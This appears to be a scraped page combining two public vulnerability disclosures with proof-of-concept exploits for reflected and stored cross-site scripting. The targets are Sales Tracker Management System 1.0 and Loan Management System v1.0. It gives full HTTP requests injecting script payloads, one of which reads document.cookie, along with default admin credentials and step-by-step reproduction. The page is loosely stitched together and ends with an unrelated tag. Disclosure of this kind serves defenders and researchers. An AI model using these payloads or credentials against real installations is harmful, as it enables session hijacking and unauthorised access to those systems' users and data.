    # Exploit Title: Sales Tracker Management System - Cross Site Scripting Vulnerability (Authenticated)# Date: 23/03/2023# Exploit Author: Abdulhakim Öner# Vendor Homepage: https://www.sourcecodester.com# Software Link: https://www.sourcecodester.com/php/16061/sales-tracker-management-system-using-php-free-source-code.html# Software Download: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-sts_0.zip# Version: 1.0# Tested on: Windows, Linux## Description A reflected Cross Site Scripting vulnerability in the "page" parameter in Sales Tracker Management System allows remote authenticated users to execute JavaScript code. ## Request PoC```GET /php-sts/admin/?page=clients'%3balert(document.cookie)%2f%2f HTTP/1.1Host: 192.168.1.100Accept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36Connection: closeCache-Control: max-age=0Referer: http://192.168.1.100/php-sts/admin/Cookie: PHPSESSID=n0brm8te79kaf0nvf7d1hvs6rm```

Sales Tracker Management System 1.0 Cross Site Scripting

SourceCodester Loan Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Type parameter under the Edit Loan Types module.

**Loan-Management-System v1.0 by itsourcecode.com has Cross-site Scripting (XSS)**

Vul\_Author: Kai Wang

Login Account:admin Password:admin123

vendors: https://itsourcecode.com/free-projects/php-project/loan-management-system-project-in-php-with-source-code/

Vulnerability File: /Loan/ajax.php

Vulnerability location: /Loan/ajax.php?action=save\_loan\_type HTTP/1.1

\[+\] Payload: <script>alert(1)</script>

Tested on Windows 10, phpStudy

There is an example with alert:

    POST /Loan/ajax.php?action=save_loan_type HTTP/1.1
    Host: 10.12.180.79
    Content-Length: 362
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.41
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl0Dh1LXu5fRCTYLI
    Origin: http://10.12.180.79
    Referer: http://10.12.180.79/Loan/index.php?page=loan_type
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
    Cookie: PHPSESSID=d4me9tekbcuef2k8k1qupv9i0t
    Connection: close
    
    ------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
    Content-Disposition: form-data; name="id"
    
    
    ------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
    Content-Disposition: form-data; name="type_name"
    
    <script>alert(1)</script>
    ------WebKitFormBoundaryl0Dh1LXu5fRCTYLI
    Content-Disposition: form-data; name="description"
    
    test loans
    ------WebKitFormBoundaryl0Dh1LXu5fRCTYLI--
    

Get into the Loan Types page,click the edit button as shown in the image

input a XSS script in the 'Type' input box

click save and you will see an alert

Tag

#apple